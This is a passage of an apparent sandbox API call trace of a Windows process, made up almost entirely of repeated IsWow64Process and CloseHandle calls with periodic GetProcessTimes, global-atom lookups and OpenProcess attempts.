	[0124.863] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.863] CloseHandle (hObject=0x69c) returned 1
	[0124.864] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.864] CloseHandle (hObject=0x69c) returned 1
	[0124.915] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.916] CloseHandle (hObject=0x69c) returned 1
	[0124.916] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.916] CloseHandle (hObject=0x69c) returned 1
	[0124.916] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.916] CloseHandle (hObject=0x69c) returned 1
	[0124.916] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.916] CloseHandle (hObject=0x69c) returned 1
	[0124.916] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.917] CloseHandle (hObject=0x69c) returned 1
	[0124.917] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.917] CloseHandle (hObject=0x69c) returned 1
	[0124.917] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.917] CloseHandle (hObject=0x69c) returned 1
	[0124.917] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.917] CloseHandle (hObject=0x69c) returned 1
	[0124.917] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.917] CloseHandle (hObject=0x69c) returned 1
	[0124.918] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.918] CloseHandle (hObject=0x69c) returned 1
	[0124.918] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.918] CloseHandle (hObject=0x69c) returned 1
	[0124.918] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.918] CloseHandle (hObject=0x69c) returned 1
	[0124.918] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.918] CloseHandle (hObject=0x69c) returned 1
	[0124.918] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.919] CloseHandle (hObject=0x69c) returned 1
	[0124.919] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.919] CloseHandle (hObject=0x69c) returned 1
	[0124.919] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.919] CloseHandle (hObject=0x69c) returned 1
	[0124.919] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.919] CloseHandle (hObject=0x69c) returned 1
	[0124.919] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.919] CloseHandle (hObject=0x69c) returned 1
	[0124.920] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.920] CloseHandle (hObject=0x69c) returned 1
	[0124.920] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.920] CloseHandle (hObject=0x69c) returned 1
	[0124.920] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.920] CloseHandle (hObject=0x69c) returned 1
	[0124.920] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.920] CloseHandle (hObject=0x69c) returned 1
	[0124.920] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.921] CloseHandle (hObject=0x69c) returned 1
	[0124.921] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.921] CloseHandle (hObject=0x69c) returned 1
	[0124.921] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.921] CloseHandle (hObject=0x69c) returned 1
	[0124.921] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.921] CloseHandle (hObject=0x69c) returned 1
	[0124.921] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.921] CloseHandle (hObject=0x69c) returned 1
	[0124.922] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.922] CloseHandle (hObject=0x69c) returned 1
	[0124.922] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.922] CloseHandle (hObject=0x69c) returned 1
	[0124.922] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.922] CloseHandle (hObject=0x69c) returned 1
	[0124.923] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.923] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.923] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.924] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.924] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.924] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.924] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.924] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.924] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.924] CloseHandle (hObject=0x69c) returned 1
	[0124.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.925] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.925] CloseHandle (hObject=0x69c) returned 1
	[0124.925] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.925] CloseHandle (hObject=0x69c) returned 1
	[0124.925] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.925] CloseHandle (hObject=0x69c) returned 1
	[0124.925] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.925] CloseHandle (hObject=0x69c) returned 1
	[0124.925] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.925] CloseHandle (hObject=0x69c) returned 1
	[0124.959] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.959] CloseHandle (hObject=0x69c) returned 1
	[0124.959] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.959] CloseHandle (hObject=0x69c) returned 1
	[0124.959] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.959] CloseHandle (hObject=0x69c) returned 1
	[0124.959] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.959] CloseHandle (hObject=0x69c) returned 1
	[0124.959] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.960] CloseHandle (hObject=0x69c) returned 1
	[0124.960] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.960] CloseHandle (hObject=0x69c) returned 1
	[0124.960] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.960] CloseHandle (hObject=0x69c) returned 1
	[0124.960] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.960] CloseHandle (hObject=0x69c) returned 1
	[0124.960] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.960] CloseHandle (hObject=0x69c) returned 1
	[0124.961] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.961] CloseHandle (hObject=0x69c) returned 1
	[0124.961] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.961] CloseHandle (hObject=0x69c) returned 1
	[0124.961] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.961] CloseHandle (hObject=0x69c) returned 1
	[0124.961] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.961] CloseHandle (hObject=0x69c) returned 1
	[0124.961] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.961] CloseHandle (hObject=0x69c) returned 1
	[0124.962] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.962] CloseHandle (hObject=0x69c) returned 1
	[0124.962] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.962] CloseHandle (hObject=0x69c) returned 1
	[0124.962] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.962] CloseHandle (hObject=0x69c) returned 1
	[0124.963] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.963] CloseHandle (hObject=0x69c) returned 1
	[0124.963] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.963] CloseHandle (hObject=0x69c) returned 1
	[0124.963] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.963] CloseHandle (hObject=0x69c) returned 1
	[0124.963] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.963] CloseHandle (hObject=0x69c) returned 1
	[0124.964] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.964] CloseHandle (hObject=0x69c) returned 1
	[0124.964] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.964] CloseHandle (hObject=0x69c) returned 1
	[0124.964] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.964] CloseHandle (hObject=0x69c) returned 1
	[0124.964] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.964] CloseHandle (hObject=0x69c) returned 1
	[0124.965] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.965] CloseHandle (hObject=0x69c) returned 1
	[0124.965] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.965] CloseHandle (hObject=0x69c) returned 1
	[0124.965] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.965] CloseHandle (hObject=0x69c) returned 1
	[0124.965] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.965] CloseHandle (hObject=0x69c) returned 1
	[0124.966] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.966] CloseHandle (hObject=0x69c) returned 1
	[0124.966] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.966] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.966] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.966] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.967] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.967] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.967] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.967] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.967] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.967] CloseHandle (hObject=0x69c) returned 1
	[0124.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.968] CloseHandle (hObject=0x69c) returned 1
	[0124.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.968] CloseHandle (hObject=0x69c) returned 1
	[0124.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.968] CloseHandle (hObject=0x69c) returned 1
	[0124.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.968] CloseHandle (hObject=0x69c) returned 1
	[0124.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.968] CloseHandle (hObject=0x69c) returned 1
	[0125.000] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.000] CloseHandle (hObject=0x69c) returned 1
	[0125.001] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.001] CloseHandle (hObject=0x69c) returned 1
	[0125.001] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.001] CloseHandle (hObject=0x69c) returned 1
	[0125.001] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.001] CloseHandle (hObject=0x69c) returned 1
	[0125.001] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.001] CloseHandle (hObject=0x69c) returned 1
	[0125.002] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.002] CloseHandle (hObject=0x69c) returned 1
	[0125.002] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.002] CloseHandle (hObject=0x69c) returned 1
	[0125.002] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.002] CloseHandle (hObject=0x69c) returned 1
	[0125.002] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.002] CloseHandle (hObject=0x69c) returned 1
	[0125.002] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.002] CloseHandle (hObject=0x69c) returned 1
	[0125.003] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.003] CloseHandle (hObject=0x69c) returned 1
	[0125.003] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.003] CloseHandle (hObject=0x69c) returned 1
	[0125.003] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.003] CloseHandle (hObject=0x69c) returned 1
	[0125.003] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.003] CloseHandle (hObject=0x69c) returned 1
	[0125.004] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.004] CloseHandle (hObject=0x69c) returned 1
	[0125.004] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.004] CloseHandle (hObject=0x69c) returned 1
	[0125.004] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.004] CloseHandle (hObject=0x69c) returned 1
	[0125.005] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.005] CloseHandle (hObject=0x69c) returned 1
	[0125.005] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.005] CloseHandle (hObject=0x69c) returned 1
	[0125.005] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.005] CloseHandle (hObject=0x69c) returned 1
	[0125.005] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.005] CloseHandle (hObject=0x69c) returned 1
	[0125.005] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.005] CloseHandle (hObject=0x69c) returned 1
	[0125.006] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.006] CloseHandle (hObject=0x69c) returned 1
	[0125.006] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.006] CloseHandle (hObject=0x69c) returned 1
	[0125.006] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.006] CloseHandle (hObject=0x69c) returned 1
	[0125.006] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.006] CloseHandle (hObject=0x69c) returned 1
	[0125.007] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.007] CloseHandle (hObject=0x69c) returned 1
	[0125.007] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.007] CloseHandle (hObject=0x69c) returned 1
	[0125.007] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.007] CloseHandle (hObject=0x69c) returned 1
	[0125.007] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.007] CloseHandle (hObject=0x69c) returned 1
	[0125.008] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.008] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.008] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.008] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.009] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.009] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.009] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.009] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.009] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.009] CloseHandle (hObject=0x69c) returned 1
	[0125.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.009] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.009] CloseHandle (hObject=0x69c) returned 1
	[0125.010] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.010] CloseHandle (hObject=0x69c) returned 1
	[0125.010] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.010] CloseHandle (hObject=0x69c) returned 1
	[0125.010] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.010] CloseHandle (hObject=0x69c) returned 1
	[0125.010] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.010] CloseHandle (hObject=0x69c) returned 1
	[0125.047] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.047] CloseHandle (hObject=0x69c) returned 1
	[0125.048] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.048] CloseHandle (hObject=0x69c) returned 1
	[0125.048] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.048] CloseHandle (hObject=0x69c) returned 1
	[0125.048] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.048] CloseHandle (hObject=0x69c) returned 1
	[0125.049] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.049] CloseHandle (hObject=0x69c) returned 1
	[0125.049] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.049] CloseHandle (hObject=0x69c) returned 1
	[0125.049] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.049] CloseHandle (hObject=0x69c) returned 1
	[0125.049] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.049] CloseHandle (hObject=0x69c) returned 1
	[0125.050] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.050] CloseHandle (hObject=0x69c) returned 1
	[0125.050] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.050] CloseHandle (hObject=0x69c) returned 1
	[0125.050] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.050] CloseHandle (hObject=0x69c) returned 1
	[0125.050] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.050] CloseHandle (hObject=0x69c) returned 1
	[0125.050] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.050] CloseHandle (hObject=0x69c) returned 1
	[0125.051] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.051] CloseHandle (hObject=0x69c) returned 1
	[0125.051] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.051] CloseHandle (hObject=0x69c) returned 1
	[0125.051] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.051] CloseHandle (hObject=0x69c) returned 1
	[0125.051] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.051] CloseHandle (hObject=0x69c) returned 1
	[0125.052] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.052] CloseHandle (hObject=0x69c) returned 1
	[0125.052] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.052] CloseHandle (hObject=0x69c) returned 1
	[0125.052] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.052] CloseHandle (hObject=0x69c) returned 1
	[0125.052] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.052] CloseHandle (hObject=0x69c) returned 1
	[0125.052] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.052] CloseHandle (hObject=0x69c) returned 1
	[0125.053] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.053] CloseHandle (hObject=0x69c) returned 1
	[0125.053] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.053] CloseHandle (hObject=0x69c) returned 1
	[0125.053] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.053] CloseHandle (hObject=0x69c) returned 1
	[0125.053] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.053] CloseHandle (hObject=0x69c) returned 1
	[0125.054] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.054] CloseHandle (hObject=0x69c) returned 1
	[0125.054] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.054] CloseHandle (hObject=0x69c) returned 1
	[0125.054] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.054] CloseHandle (hObject=0x69c) returned 1
	[0125.054] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.054] CloseHandle (hObject=0x69c) returned 1
	[0125.055] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.055] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.055] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.055] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.055] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.056] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.056] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.056] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.056] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.056] CloseHandle (hObject=0x69c) returned 1
	[0125.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.057] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.057] CloseHandle (hObject=0x69c) returned 1
